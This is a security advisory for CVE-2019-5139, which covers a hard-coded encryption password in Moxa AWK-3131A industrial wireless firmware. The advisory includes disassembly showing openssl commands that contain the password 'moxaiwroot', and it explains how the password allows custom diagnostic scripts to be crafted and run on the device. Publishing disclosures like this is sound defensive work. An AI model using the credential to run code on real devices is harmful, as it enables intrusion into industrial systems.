CVE-2019-5139
An exploitable use of hard-coded credentials vulnerability exists in multiple iw_* utilities of the Moxa AWK-3131A firmware version 1.13. The device operating system contains an undocumented encryption password, allowing for the creation of custom diagnostic scripts.
Moxa AWK-3131A Firmware version 1.13
http://www.moxa.com/product/AWK-3131A.htm
CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CWE-798: Use of Hard-coded Credentials
The Moxa AWK-3131A Industrial IEEE 802.11a/b/g/n wireless AP/bridge/client is a wireless networking appliance intended for use in industrial environments. It is designed to provide wireless communication capabilities to the environments in which it is deployed. Communication with the device is possible using HTTP, Telnet, and SSH.
A hard coded password (moxaiwroot) is used while decrypting any diagnostic scripts uploaded through the device’s troubleshooting portal. With this password it is possible to create custom diagnostic scripts to run on the device.
Disassembly for each of the four locations can be found below:
...
00402a38 8fdc0018 lw $gp, 0x18($fp) {var_c8}
00402a3c 3c020040 lui $v0, 0x40
00402a40 24444fe4 addiu $a0, $v0, 0x4fe4 {0x404fe4, "openssl aes-256-cbc -k moxaiwroot -salt -in %s -out %s%s"}
00402a44 3c020040 lui $v0, 0x40
00402a48 24454fd0 addiu $a1, $v0, 0x4fd0 {0x404fd0, "/var/ts_zip_result"}
00402a4c 3c020040 lui $v0, 0x40
00402a50 24464f90 addiu $a2, $v0, 0x4f90 {0x404f90, "/var/"}
00402a54 8fc70100 lw $a3, 0x100($fp) {arg6}
00402a58 8f828050 lw $v0, -0x7fb0($gp) {iw_system_quiet}
00402a5c 0040c821 move $t9, $v0
00402a60 0320f809 jalr $t9
There is a second location in iw_troubleshoot where the password is used:
…
00402ee0 8fdc0020 lw $gp, 0x20($fp) {var_e48}
00402ee4 8fc20e78 lw $v0, 0xe78($fp) {arg4}
00402ee8 8c420000 lw $v0, ($v0)
00402eec 8fc30e6c lw $v1, 0xe6c($fp) {arg_4}
00402ef0 afa30010 sw $v1, 0x10($sp) {var_e58}
00402ef4 8fc30e70 lw $v1, 0xe70($fp) {arg_8}
00402ef8 afa30014 sw $v1, 0x14($sp) {var_e54}
00402efc 27c3003c addiu $v1, $fp, 0x3c {var_e2c}
00402f00 afa30018 sw $v1 {var_e2c}, 0x18($sp) {var_e50}
00402f04 3c030040 lui $v1, 0x40
00402f08 246450cc addiu $a0, $v1, 0x50cc {0x4050cc, “openssl aes-256-cbc -k moxaiwroot -salt -in %s -out %sTS_%d_%s_%s_%s.aes”}
00402f0c 3c030040 lui $v1, 0x40
00402f10 24654fd0 addiu $a1, $v1, 0x4fd0 {0x404fd0, “/var/ts_zip_result”}
00402f14 3c030040 lui $v1, 0x40
00402f18 24664f90 addiu $a2, $v1, 0x4f90 {0x404f90, “/var/”}
00402f1c 00403821 move $a3, $v0
00402f20 8f828050 lw $v0, -0x7fb0($gp) {iw_system_quiet}
00402f24 0040c821 move $t9, $v0
00402f28 0320f809 jalr $t9
00402f2c 00000000 nop
…
...
00401aec 8fdc0010 lw $gp, 0x10($fp) {var_10}
00401af0 3c020040 lui $v0, 0x40
00401af4 24442954 addiu $a0, $v0, 0x2954 {0x402954, "openssl aes-256-cbc -k moxaiwroot -salt -in %s -out %s"}
00401af8 3c020040 lui $v0, 0x40
00401afc 24452944 addiu $a1, $v0, 0x2944 {0x402944, "/var/rdinfo.zip"}
00401b00 3c020040 lui $v0, 0x40
00401b04 2446298c addiu $a2, $v0, 0x298c {0x40298c, "/var/rdinfo.aes"}
00401b08 8f828048 lw $v0, -0x7fb8($gp) {iw_system_quiet}
00401b0c 0040c821 move $t9, $v0
00401b10 0320f809 jalr $t9
00401b14 00000000 nop
...
00457dcc 27bdfed8 addiu $sp, $sp, -0x128
00457dd0 afbf0124 sw $ra, 0x124($sp) {__saved_$ra}
00457dd4 afbe0120 sw $fp, 0x120($sp) {__saved_$fp}
00457dd8 03a0f021 move $fp, $sp {var_128}
00457ddc 3c1c004d… li $gp, 0x4cb8f0
00457de4 afbc0010 sw $gp, 0x10($sp) {var_118} {_gp}
00457de8 afc40128 sw $a0, 0x128($fp) {arg_0}
00457dec afc5012c sw $a1, 0x12c($fp) {arg_4}
00457df0 afc0001c sw $zero, 0x1c($fp) {var_10c} {0x0}
00457df4 afc00018 sw $zero, 0x18($fp) {var_110} {0x0}
00457df8 3c020047 lui $v0, 0x47
00457dfc 244416e4 addiu $a0, $v0, 0x16e4 {0x4716e4, "openssl aes-256-cbc -d -k moxaiwroot -salt -in \"%s\" -out \"%s\""}
00457e00 8fc50128 lw $a1, 0x128($fp) {arg_0}
00457e04 8fc6012c lw $a2, 0x12c($fp) {arg_4}
00457e08 8f828764 lw $v0, -0x789c($gp) {iw_system}
00457e0c 0040c821 move $t9, $v0
00457e10 0320f809 jalr $t9
00457e14 00000000 nop
...
2019-10-22 - Vendor Disclosure
2020-02-24 - Public Release
Discovered by Patrick DeSantis, Carl Hurd, and Jared Rittle of Cisco Talos.